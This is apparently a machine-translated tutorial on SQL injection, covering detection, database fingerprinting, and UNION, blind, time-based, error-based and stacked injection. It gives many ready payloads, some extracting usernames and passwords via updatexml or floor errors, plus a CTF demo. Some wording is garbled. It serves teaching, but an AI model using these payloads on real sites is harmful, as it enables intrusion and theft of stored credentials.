Title: SQL injection related

1 数据库相关

1.1 定义

A database is a warehouse for storing data.

A data set that is stored together in a certain way, can be shared with multiple users, has the smallest possible redundancy, and is independent of each other from the application

1.2 分类

关系型数据库 - SQLSimilar to tables, there is a complex relationship between tables and tables before

MySQL, SQLServer, etc.

非关系型数据库 - NoSQLKey - Value form, simplifying database structure and avoiding redundancy.

MangoDB, Redis, memcached

1.3 基本操作

查看数据库1

show databases();

使用数据库1

use information_schema

查看当前使用数据库1

select database();

查看数据表1

show tables();

查看数据库版本1

select version();

使用当前数据库的用户1

select user();

查看数据库路径1

select @@datadir

查看安装路径1

select @@basedir

查看系统类型1

select @@version_compile_os

1.4 元数据表 - information_schema

information_schemais an information database that holds information about all other databases maintained by the MySQL server. Such as database name, database table, table data type and access permissions, etc. It is very useful in the process of web penetration

TableSCHEMATA: Provides information about all databases in the current MySQL instance. This table is taken from the result of show databases.

TABLESTable: Provides information about tables in the database (including views).

COLUMNSTable: Provides column information in the table. Describes the information of all columns of a table and each column in detail.

通过元数据表查询数据表1

select table_name from information_schema.tables where table_schema='test';

通过元数据表查询数据列1

select column_name from information_schema.columns where table_name='table1';

2 SQL 注入定义及类型

2.1 定义

Security vulnerability that occurs in the application and database layer

SQL requests sent directly within the website are generally not dangerous, but the actual situation is that SQL statements need to be dynamically constructed in combination with user input data. If the input data is constructed into malicious SQL code and the web application does not review the parameters used by dynamically constructed SQL statements, it will bring security risks.

形成原因User can control parameter transfer

The content of the user's arguments is spliced in the SQL statement

The spliced SQL statement is executed in the database

Summary: The data entered by the user is executed as code

2.2 分类

Boolean injection

Joint query injection

Time-type injection

Error-reported injection

Stacked injection (multi-statement query injection)

3 判断 SQL 注入

question

Determine whether the access target URL has SQL injection?

If SQL injection exists, what kind of SQL injection belongs to?

Determine the type of SQL injection backend database?

3.1 经典的单引号判断法

http://xxx/text.php?id=1'

If the page returns an error, SQL injection exists; the reason is that both character types and integer types will report an error because the number of single quotes does not match.

3.2 判断注入类型

数字型Usually construct and 1=1 and and 1=2 to judge

运算符判断法：The key to this judgment method is to determine whether there are quotation marks wrapped around the input parameters through addition, subtraction, multiplication, division and other operations, and then obtain sensitive information of the database through some general attack methods.

字符型Usually construct and '1'='1 and and '1'='2 to judge

类型转换判断法：In MySQL, if the types on both sides of the equal sign are inconsistent, a cast will occur. When a number is compared with the string data, the string will be converted to a number and then compared. String 1 is equal to the number; string 1a is cast to 1, equal to 1; string a is cast to 0, so equal to 0.

According to this feature, it is easy to judge whether the input point is character type, that is, whether it is wrapped in quotes (maybe single or double quotes, in most cases single quotes). Visit ?id=3-2, the page is empty, not a numeric type, but may be a character type. Continue to try to access ?id=2a, and the result is successfully returned, indicating that it is a character type.

3.3 SQL 数据库的类型

3.3.1 通过报错信息

MySQL

you have an error in your SQL syntax,check the manual that corresponds to your mysql server version for the tifht syntax to use near ” at line x

Access

Microsoft JET Database…

MSSQL

Microsoft ODBC Database…

3.3.2 数据库标志性信息

sql server: select @@version--

Oracle: select banner from v$version

mysql: select @@version, version()--, length(user)0 is normal

postgresql: select version()--

3.3.3 数据库特有库名

MySQL: information_schema

Access: mysysobjects

Oracle: sys.user_tables

MSSQL: sysobjects

3.3.4 数据库特有函数

sql server: @@pack_received @@rowcount

mysql: connection_id(), last_insert_id(), row_count()

orcale: bitand(1,1)

postgresql: select extract(dow from now())

Substring can be called in mssql. oracle can only call substr

3.3.5 字符串处理方式

mssql:id=1 and 'a'+'b'='ab'

mysql: id=1 and 'a'+'b'='ab' , 'ab'=concat('a','b')

oracle: id=1 and 'a'+'b'='a'||'b', 'ab'=concat('a','b')

postgresql:id=1 and 'a'+'b'='a'||'b' ,'ab'=concat('a','b')

3.3.6 特殊符号及注释

null and %00 are comments supported by access

# is a comment in MySQL, and returns an error that indicates that the injection point may not be MySQL. In addition, it also supports -- , and /* */comments

-- and /* */are comments supported by Oracle, SQL server, and MySQL. If it is normal, the instructions may be one of these three databases.

; is a clause query identifier. Multi-line queries are not supported in Oracle. It returns an error and is likely an Oracle database.

4 UNION 联合查询注入

4.1 原理

The union operator is used to merge the result set of two queries or multiple select statements

information

The select statement inside UNION must have the same number of columns.

Through UNION joint query, directly returning the query results to the page is the easiest way to inject it.

4.2 常用语句

1

2

3

4

5

6

7

8

9

10

11

12

13

//Library name

union select 1,group_concat(schema_name),3 from information_schema.schemata

union select 1,(select schema_name from information_schema.schemata limit 0,1),3

//Table name

union select 1,group_concat(table_name),3 from information_schema.tables where table_schema='security'

//Column name

union select 1,group_concat(column_name),3 from information_schema.columns where table_schema='security' and table_name='emails'

//data

union select 1,group_concat(id,email_id),3 from security.emails

5 时间型盲注 布尔型盲注

Blind annotation is a type of injection, which refers to guessing the content in the data without knowing the database return value and implementing SQL injection. Blind bets are generally divided into Boolean bets, time-based bets and error-reported blinds.

时间型: By injecting a specific statement, determine whether the injection is successful based on the physical feedback requested by the page. For example, use the sleep() function in the SQL statement to judge the injection point by looking at the time of loading the web page.

布尔型: The page only returns two states (types) pages, True and False. Use the page to return different data and guess the data one by one.

Applicable scenarios: Usually, the execution result cannot be obtained from the display page, and there is no way to know whether the injection statement is executed.

5.1 原理示意

select * from user where id='?'

? Enter for user, substitute: 4' and sleep(3)#

The actual SQL statement executed: select * from user where id='4' and sleep(3)#

When ID=4 exists, sleep 3 seconds

When ID=4 does not exist, return directly

If the entire spliced SQL is correct, the sleep is executed. The previous error (does not exist), sleep(3) will not be executed.

5.2 常用函数

5.2.1 编码转换函数

ord('a'): Convert characters into ascii code

ascii('a'): converts characters into ascii code

char(97): Convert ascii into characters

5.2.2 条件判断函数

if(exp1, exp2, exp3): exp1 is established, execute exp2, otherwise execute exp3.

case when then function: select case when username='admin' then sleep(1) else 'error' end from wp_user_

5.2.3 截取函数

substr 函数substr(str, pos, len): start from the pos position, and intercept the len length of the string str

substr(str from pos for length): can be used to filter the situation,

substring 函数substring(str, pos, len): starts from the pos position, and intercepts the len length of the string str

substring(str from pos for length): can be used to filter the situation,

Note: pos starts at 1

1

2

3

id=1 and if(ord(substr(database(),1,1))=116,1,0)%23

select substring(database(), from 1 for 1)

select substring(database(), 0, 1)

mid 函数mid(str, pos, length)

mid(str from pos for length)

1

2

select mid(database(), from 1 for 1)

select mid(database(), 1, 1)

left 函数Snipped string from left

left(str, len)

1

select left(database(), 1)

right 函数Snipped string from right

right(str, len)

利用正则表达式逐位匹配1

2

3

4

select * from wp_user_ where password rlike '^1'

select * from wp_user_ where password REGEXP '^1'

select * from wp_user_ where password REGEXP '^12'

.

5.2.4 延时函数

sleep(n): program suspends n seconds

1

if(ascii(substr(database() from 0))=97, sleep(3),0)

benchmark(count, sha(1)): Execute the sha(1) function count times to achieve the purpose of delay

1

SELECT BENCHMARK(10000000, sha(1))

Use Cartesian product to create delays:

1

SELECT count(*) from information_schema.columns A, information_schema.columns B, information_schema.tables C;

Use regular expressions to match long strings to create delays:

1

select * from wp_user_ where id=1 and IF(1,concat(rpad(1,999999,'a'),rpad(1,99999,'a'),rpad(1,99999,'a'),rpad(1,99999,'a'),rpad(1,99999,'a'),rpad(1,99999,'a'),rpad(1,99999,'a'),rpad(1,999999,'a'),rpad(1,999999,'a'),rpad(1,999999 ,'a'),rpad(1,999999,'a'),rpad(1,99999,'a'),rpad(1,99999,'a'),rpad(1,99999,'a'),rpad(1,99999,'a'),rpad(1,99999,'a')) RLIKE '(a.*)+(a.*)+(a.*)+(a.*)+(a.*)+(a.*)+(a.*)+(a.*)+(a.*)+b',0)

5.2.5 其它函数

count(): calculate the total number

length(): Returns the length of the string

6 报错型注入

6.1 原理

Syntax for using SQL statement errors, used to inject the result without echo, but the error message is displayed with output

The returned information is the information needed by the attacker

MySQL error injection is mainly divided into the following categories:

Overflow of data types such as BigInt

Xpath syntax error

count() + rand() + group by causes the primary key to be repeated

Space data type function error

6.2 常用函数

6.2.1 updatexml

updatexml The second parameter needs to be passed in is a string in Xpath format. If the input does not match, return the parameter value and report an error.

The maximum error length is 32 bits

1

2

3

4

5

6

7

8

9

10

11

12

13

14

15

16

17

18

19

20

twenty one

twenty two

twenty three

twenty four

//Show the current database

updatexml(1,CONCAT(0x7e, database()),1)

//Show all databases

updatexml(1,CONCAT(0x7e,(select schema_name FROM INFORMATION_SCHEMA.SCHEMATA limit x,1),0x7e),1)

//Get the table name

updatexml(1,CONCAT(0x7e,(select table_name from information_schema.tables where table_schema='sectest' limit x,1),0x7e),1)

updatexml(1,make_set(3,'~',(select group_concat(table_name) from information_schema.tables where table_schema=database())),1)

//Get the column name

updatexml(1,CONCAT(0x7e,(select column_name from information_schema.COLUMNS where table_name='wp_user_' limit 1,1),0x7e),1)

updatexml(1,make_set(3,'~',(select group_concat(column_name) from information_schema.columns where table_name='users')),1)

//Get data

updatexml(1,CONCAT(0x7e,(select username from wp_user_ limit 0,1),0x7e),1)

updatexml(1,CONCAT(0x7e,(select password from wp_user_ where username='admin' limit 0,1),0x7e),1)

updatexml(1,CONCAT(0x7e,(select GROUP_CONCAT(username,0x3a, password) from wp_user_ where id=1),0x7e),1)

updatexml(1,make_set(3,'~',(select data from users)),1)#

6.2.2 floor 显错注入

1

2

3

and (select 1 from (select count(*), concat(user(), floor(rand(0)*2))x from information_schema.tables group by x)a)

and (select 1 from (select count(*), concat((select group_concat(username,0x3a,password) from wp_user_ where id=1), floor(rand(0)*2))x from information_schema.tables group by x)a)

6.2.3 其它显错注入

1

2

3

4

5

6

7

and extractvalue(1,concat(0x7e,(select database())))

//1105 - XPATH syntax error: '~sectest', Time: 0.000000s

and exp(~(select * from (select user())a)) //mysql5

union select * from (select NAME_CONST(version(),1),NAME_CONST(version(),1))a;

//1060 - Duplicate column name '5.7.23', Time: 0.000000s

6.3 Demo

http://ctf5.shiyanbar.com/web/baocuo/index.php

payload1

2

3

4

updatexml(1,concat(0x7e,(version())),0)

http://ctf5.shiyanbar.com/web/baocuo/index.php

$sql=' select * from users where username='' and updatexml /*' and password='*/(1,concat(0x7e,(version())),0) or '1' '

7 堆叠注入

A bunch of SQL statements (multiple) are executed together

In MySQL, mainly in the command line, adding ; at the end of each statement means the end of the statement. This allows you to consider using multiple SQL statements together

question

What is the difference between stack injection and UNION injection?

The statement types executed by UNION are limited and can only be used to execute query statements.

Stack injection can execute any statement

Notice